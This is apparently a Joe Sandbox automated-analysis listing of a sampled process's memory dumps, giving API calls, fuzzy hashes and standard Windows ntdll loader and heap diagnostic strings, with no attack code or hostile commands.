                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: b291422afab1277ff62b94335d034247e40cb8db2e1ee972acb18dbd04f5ce06
                                                                                    • Instruction ID: 984be99464ea8a0e511d9b0ad4bece1192f89614f68eacda88fea4aeccd9f592
                                                                                    • Opcode Fuzzy Hash: b291422afab1277ff62b94335d034247e40cb8db2e1ee972acb18dbd04f5ce06
                                                                                    • Instruction Fuzzy Hash: 4CE06D762002087FC614EF59DC41E9B73ADEFC9714F004019FA08A7241D7B0B9118BB5

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 211 42cd93-42cdd4 call 404753 call 42dc33 RtlFreeHeap
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,985BA8BF,00000007,00000000,00000004,00000000,00417425,000000F4), ref: 0042CDCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: d895ccf3f795f216020c7fb14d416f54cb9af9c4f1d97725b2e4c10ec2a29cc2
                                                                                    • Instruction ID: d073d98c3614cad591f8c5c415a8273d31031a41d69a7a76661ae20d9a26413d
                                                                                    • Opcode Fuzzy Hash: d895ccf3f795f216020c7fb14d416f54cb9af9c4f1d97725b2e4c10ec2a29cc2
                                                                                    • Instruction Fuzzy Hash: 39E06D722002087BC614EE59EC41F9B77ACDFC5754F008019FA18A7241C6B0BA10C7B9

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 221 42cde3-42ce1c call 404753 call 42dc33 ExitProcess
                                                                                    APIs
                                                                                    • ExitProcess.KERNEL32(?,00000000,00000000,?,6C50F49A,?,?,6C50F49A), ref: 0042CE17
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_400000_NEW.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ExitProcess
                                                                                    • String ID:
                                                                                    • API String ID: 621844428-0
                                                                                    • Opcode ID: 4bb5dac981b431e742f4426a8473249ad855d4829b79789bbbb5ca46e6b896fc
                                                                                    • Instruction ID: def3be7616ed772aff3aca2395beef2229bc1b2c901884df9646eac8241c3065
                                                                                    • Opcode Fuzzy Hash: 4bb5dac981b431e742f4426a8473249ad855d4829b79789bbbb5ca46e6b896fc
                                                                                    • Instruction Fuzzy Hash: 75E04F722002187BD620BA5AEC41F97BB6CDFC5754F50801AFA0877282C6B0B901C7B4

                                                                                    Control-flow Graph
                                                                                    control_flow_graph 226 1892c0a-1892c0f 227 1892c1f-1892c26 LdrInitializeThunk 226->227 228 1892c11-1892c18 226->228
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 15072ec7a4cae7fddf5ebc271fee91c552ffd59bbc8c216cbe29fc2b87721cd2
                                                                                    • Instruction ID: 3dbc77c47cfe2518c6c417878ffb0adba3d3495826d721d57c054ab7bb6c1682
                                                                                    • Opcode Fuzzy Hash: 15072ec7a4cae7fddf5ebc271fee91c552ffd59bbc8c216cbe29fc2b87721cd2
                                                                                    • Instruction Fuzzy Hash: 0DB09B71E015C5DAEF11E7A44608717790177D1705F59C061D3034651F4738D2D5E276
                                                                                    Strings
                                                                                    • The resource is owned exclusively by thread %p, xrefs: 01908E24
                                                                                    • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01908F34
                                                                                    • The instruction at %p referenced memory at %p., xrefs: 01908EE2
                                                                                    • a NULL pointer, xrefs: 01908F90
                                                                                    • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01908DC4
                                                                                    • *** Resource timeout (%p) in %ws:%s, xrefs: 01908E02
                                                                                    • This failed because of error %Ix., xrefs: 01908EF6
                                                                                    • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01908E3F
                                                                                    • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01908FEF
                                                                                    • <unknown>, xrefs: 01908D2E, 01908D81, 01908E00, 01908E49, 01908EC7, 01908F3E
                                                                                    • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01908F26
                                                                                    • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01908E86
                                                                                    • an invalid address, %p, xrefs: 01908F7F
                                                                                    • read from, xrefs: 01908F5D, 01908F62
                                                                                    • The resource is owned shared by %d threads, xrefs: 01908E2E
                                                                                    • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01908F2D
                                                                                    • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01908DB5
                                                                                    • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01908E4B
                                                                                    • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01908DA3
                                                                                    • The critical section is owned by thread %p., xrefs: 01908E69
                                                                                    • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01908DD3
                                                                                    • *** Inpage error in %ws:%s, xrefs: 01908EC8
                                                                                    • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01908D8C
                                                                                    • *** An Access Violation occurred in %ws:%s, xrefs: 01908F3F
                                                                                    • *** enter .cxr %p for the context, xrefs: 01908FBD
                                                                                    • *** enter .exr %p for the exception record, xrefs: 01908FA1
                                                                                    • The instruction at %p tried to %s , xrefs: 01908F66
                                                                                    • *** then kb to get the faulting stack, xrefs: 01908FCC
                                                                                    • Go determine why that thread has not released the critical section., xrefs: 01908E75
                                                                                    • write to, xrefs: 01908F56
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                    • API String ID: 0-108210295
                                                                                    • Opcode ID: 2ca313aecaeb349820f9165ff8a1d8198d046a86ad8a54935003646a75864654
                                                                                    • Instruction ID: 12cc041f5e844d3f6b438a506caf6b5083e064f74211cc8beec56be883c4f49a
                                                                                    • Opcode Fuzzy Hash: 2ca313aecaeb349820f9165ff8a1d8198d046a86ad8a54935003646a75864654
                                                                                    • Instruction Fuzzy Hash: 67811A79B40314BFDB12AB198C85E6B3B75EF56B10F040048F70DDF292E7758A12D6A2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-2160512332
                                                                                    • Opcode ID: d9e98a2f2627f84d4e22e19187e3a2a333085a936c3f1dad43c28dd9ebb19e74
                                                                                    • Instruction ID: 07c8ac8d4f23587c6f7f211c8782625d364027980d5c7d66b018276e21afe2b7
                                                                                    • Opcode Fuzzy Hash: d9e98a2f2627f84d4e22e19187e3a2a333085a936c3f1dad43c28dd9ebb19e74
                                                                                    • Instruction Fuzzy Hash: 1B929D71608346AFE721DF28C880F6BB7EABB84754F04492DFA94D7251D770EA44CB92
                                                                                    Strings
                                                                                    • 8, xrefs: 018C52E3
                                                                                    • Thread identifier, xrefs: 018C553A
                                                                                    • double initialized or corrupted critical section, xrefs: 018C5508
                                                                                    • undeleted critical section in freed memory, xrefs: 018C542B
                                                                                    • Critical section address, xrefs: 018C5425, 018C54BC, 018C5534
                                                                                    • Critical section address., xrefs: 018C5502
                                                                                    • corrupted critical section, xrefs: 018C54C2
                                                                                    • Invalid debug info address of this critical section, xrefs: 018C54B6
                                                                                    • Address of the debug info found in the active list., xrefs: 018C54AE, 018C54FA
                                                                                    • Critical section debug info address, xrefs: 018C541F, 018C552E
                                                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 018C5543
                                                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018C54CE
                                                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018C54E2
                                                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018C540A, 018C5496, 018C5519
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                    • API String ID: 0-2368682639
                                                                                    • Opcode ID: 7257fb1308a4e52c8738c5fda5803851f9db13155e73b78ed8b2892a03ad418d
                                                                                    • Instruction ID: 1a647fd39f90b179187af4eefcbb27c02006c35bb4fac4be71334c8f0720002b
                                                                                    • Opcode Fuzzy Hash: 7257fb1308a4e52c8738c5fda5803851f9db13155e73b78ed8b2892a03ad418d
                                                                                    • Instruction Fuzzy Hash: 158158B1A41358ABDF20CF99C885BAEBBB5BB49B14F14411DF504F7641D3B9AA40CBA0
                                                                                    Strings
                                                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 018C2602
                                                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018C25EB
                                                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 018C2498
                                                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 018C2624
                                                                                    • @, xrefs: 018C259B
                                                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 018C2412
                                                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018C22E4
                                                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018C24C0
                                                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 018C261F
                                                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 018C2506
                                                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 018C2409
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                    • API String ID: 0-4009184096
                                                                                    • Opcode ID: bdb42a5125333f66224bafc4e8ef1d0782497f25bd95babdfcfafbb1c949dca4
                                                                                    • Instruction ID: b6c8137d4f44255a779d327a1bfbd4e19d5e94eef086ae0889d75940cae69d16
                                                                                    • Opcode Fuzzy Hash: bdb42a5125333f66224bafc4e8ef1d0782497f25bd95babdfcfafbb1c949dca4
                                                                                    • Instruction Fuzzy Hash: 6F0250F1D002299FDB31DB58CD80BAAB7BAAF54714F0441DAA609E7281DB709F84CF59
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                    • API String ID: 0-2515994595
                                                                                    • Opcode ID: 78efd7db2cdea8383ace0baa33cc5fe70f72fc9d98031b728e0954b7a9cfa86f
                                                                                    • Instruction ID: 075c0ef6dc19ad6b1181086b51b1b23e0d1c43c8b4ed7c502777a5b523cf7ff5
                                                                                    • Opcode Fuzzy Hash: 78efd7db2cdea8383ace0baa33cc5fe70f72fc9d98031b728e0954b7a9cfa86f
                                                                                    • Instruction Fuzzy Hash: 9A51EF716053169BD326DF198844BABBBE8EF96340F14491DEB98C3281E770D748CB92
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-3197712848
                                                                                    • Opcode ID: 7358ec0973f7d9d6850ae547cde2e87bc49294da63dc0d05d64651d85431b85d
                                                                                    • Instruction ID: 56af11389d4f011d4e1cc7b8af852ba156a4ecd8c9972c98e9bddd67bbe71f2d
                                                                                    • Opcode Fuzzy Hash: 7358ec0973f7d9d6850ae547cde2e87bc49294da63dc0d05d64651d85431b85d
                                                                                    • Instruction Fuzzy Hash: 8812D0716093468BD325DF28C880BAABBE8BF95718F04051DF985DB291E734DB44CB93
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                    • API String ID: 0-1700792311
                                                                                    • Opcode ID: 7aa805e38ce2dce38f4a701c1caddae574a69649718b4e9d4b3e78ee313c220e
                                                                                    • Instruction ID: a7b3a6987ab6da831cf1ce7cefe0c319e24847940557159a040711042d675c77
                                                                                    • Opcode Fuzzy Hash: 7aa805e38ce2dce38f4a701c1caddae574a69649718b4e9d4b3e78ee313c220e
                                                                                    • Instruction Fuzzy Hash: 8DD1DD35604685EFDB23DFA8C440BA9BBF6FF4A740F088059F4499B292DB35DA81CB15
                                                                                    Strings
                                                                                    • VerifierDebug, xrefs: 018D8CA5
                                                                                    • VerifierDlls, xrefs: 018D8CBD
                                                                                    • VerifierFlags, xrefs: 018D8C50
                                                                                    • HandleTraces, xrefs: 018D8C8F
                                                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 018D8A3D
                                                                                    • AVRF: -*- final list of providers -*- , xrefs: 018D8B8F
                                                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 018D8A67
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                    • API String ID: 0-3223716464
                                                                                    • Opcode ID: b8bb44bad5b7c21752acab86bc20b240d7ca80a8090d7aca9ccd226af1cdd98f
                                                                                    • Instruction ID: 81f451a82daefa35d809e2396051a57555148945dc345f4c0a97446fa1b38a86
                                                                                    • Opcode Fuzzy Hash: b8bb44bad5b7c21752acab86bc20b240d7ca80a8090d7aca9ccd226af1cdd98f
                                                                                    • Instruction Fuzzy Hash: 81912571A45716EFE721EF6C8880F5B77A4AB96714F060419FA45EB281D730DF00CB92
                                                                                    Strings
                                                                                    • Execute '.cxr %p' to dump context, xrefs: 018D4EB1
                                                                                    • minkernel\ntdll\ldrutil.c, xrefs: 018D4E06
                                                                                    • Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p, xrefs: 018D4DF5
                                                                                    • LdrpGenericExceptionFilter, xrefs: 018D4DFC
                                                                                    • Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? , xrefs: 018D4E38
                                                                                    • LdrpProtectedCopyMemory, xrefs: 018D4DF4
                                                                                    • ***Exception thrown within loader***, xrefs: 018D4E27
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ***Exception thrown within loader***$Break repeatedly, break Once, Ignore, terminate Process or terminate Thread (boipt)? $Execute '.cxr %p' to dump context$Function %s raised exception 0x%08lxException record: .exr %pContext record: .cxr %p$LdrpGenericExceptionFilter$LdrpProtectedCopyMemory$minkernel\ntdll\ldrutil.c
                                                                                    • API String ID: 0-2973941816
                                                                                    • Opcode ID: 75f2421781778e545e77895543183cc3ce806203cc6026631bee456095846b63
                                                                                    • Instruction ID: 61f32dbe4b7268cf2bc01d231b9d1f1a22b4cd129bdea384660209a17577ac58
                                                                                    • Opcode Fuzzy Hash: 75f2421781778e545e77895543183cc3ce806203cc6026631bee456095846b63
                                                                                    • Instruction Fuzzy Hash: 97215B72188315BBE7289A6D9C86D267F98FB81B74F180105F612D6E80C974DF02C2A2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                    • API String ID: 0-1109411897
                                                                                    • Opcode ID: 50ac0e9b3fde62f25088e69b33f536ed7eaed3074141cd98f6c965928e2bc1fd
                                                                                    • Instruction ID: 14004180fd15dd59af39f8f4a46c52ea9739a9ea1c8a5905205edbd7cf1f4e08
                                                                                    • Opcode Fuzzy Hash: 50ac0e9b3fde62f25088e69b33f536ed7eaed3074141cd98f6c965928e2bc1fd
                                                                                    • Instruction Fuzzy Hash: 0EA22774A0562A8BDBA5DF18CC887A9BBB5EF49304F1442E9D90AE7351DB349F85CF00
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                    • API String ID: 0-4098886588
                                                                                    • Opcode ID: 187c7a233c6b6d7a365b95074979c5cc30d05f5d1b76b9e5d00b1a4b25928367
                                                                                    • Instruction ID: a2e824de520879e8a1a0298bc156bffbfec19119f1a66b502fccfcbff609c3b3
                                                                                    • Opcode Fuzzy Hash: 187c7a233c6b6d7a365b95074979c5cc30d05f5d1b76b9e5d00b1a4b25928367
                                                                                    • Instruction Fuzzy Hash: D932AC709402698BEBA2CB18C894BEEBBB6FF55344F1441EAEC49E7251D7319F818F50
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-792281065
                                                                                    • Opcode ID: 3c4ab002f59080bc08c354a1d16ae390907e5f1e386bb704481540ad577c8631
                                                                                    • Instruction ID: ac281fdc0cb7cc21a7e29f4b134ed552e0995b6e57e5f4014d1a15d6d889a161
                                                                                    • Opcode Fuzzy Hash: 3c4ab002f59080bc08c354a1d16ae390907e5f1e386bb704481540ad577c8631
                                                                                    • Instruction Fuzzy Hash: F7913670B043159BEB25EF6CD895FAE7BA2BF41B24F24011DE940EB281EB749B41C791
                                                                                    Strings
                                                                                    • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018A9A2A
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 018A9A11, 018A9A3A
                                                                                    • apphelp.dll, xrefs: 01846496
                                                                                    • Getting the shim engine exports failed with status 0x%08lx, xrefs: 018A9A01
                                                                                    • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 018A99ED
                                                                                    • LdrpInitShimEngine, xrefs: 018A99F4, 018A9A07, 018A9A30
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                    • API String ID: 0-204845295
                                                                                    • Opcode ID: e31171cd5c9354a7655de767844f440ab881d90bf1d9e708da230eaf8e756925
                                                                                    • Instruction ID: 8635a44c47c7b208e25b93dac7b7e9cccf97fd57c9530361adf90b0c820d0386
                                                                                    • Opcode Fuzzy Hash: e31171cd5c9354a7655de767844f440ab881d90bf1d9e708da230eaf8e756925
                                                                                    • Instruction Fuzzy Hash: C151B0716083089FE720DF28D891E6B77E9BB84748F54491EF585D7260EA30EB04CB92
                                                                                    Strings
                                                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 018C8181, 018C81F5
                                                                                    • Loading import redirection DLL: '%wZ', xrefs: 018C8170
                                                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 018C81E5
                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0188C6C3
                                                                                    • LdrpInitializeProcess, xrefs: 0188C6C4
                                                                                    • LdrpInitializeImportRedirection, xrefs: 018C8177, 018C81EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                    • API String ID: 0-475462383
                                                                                    • Opcode ID: cf65d1579987eef20da9245ed591194aac3e9795194b9774fdb3334b88021b1b
                                                                                    • Instruction ID: 4e8b8f38b05221c3d7c9ac0f2f201ca9f8eb69e7f7f4fe6c5799b07a41057a29
                                                                                    • Opcode Fuzzy Hash: cf65d1579987eef20da9245ed591194aac3e9795194b9774fdb3334b88021b1b
                                                                                    • Instruction Fuzzy Hash: 8431F3716483069BC220EB2DD985E1ABBE5AF95B14F04056CF980EB291E724EF04C7A3
                                                                                    Strings
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 018C2180
                                                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 018C21BF
                                                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 018C2178
                                                                                    • SXS: %s() passed the empty activation context, xrefs: 018C2165
                                                                                    • RtlGetAssemblyStorageRoot, xrefs: 018C2160, 018C219A, 018C21BA
                                                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 018C219F
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000F.00000002.1464991439.0000000001820000.00000040.00001000.00020000.00000000.sdmp, Offset: 01820000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_15_2_1820000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
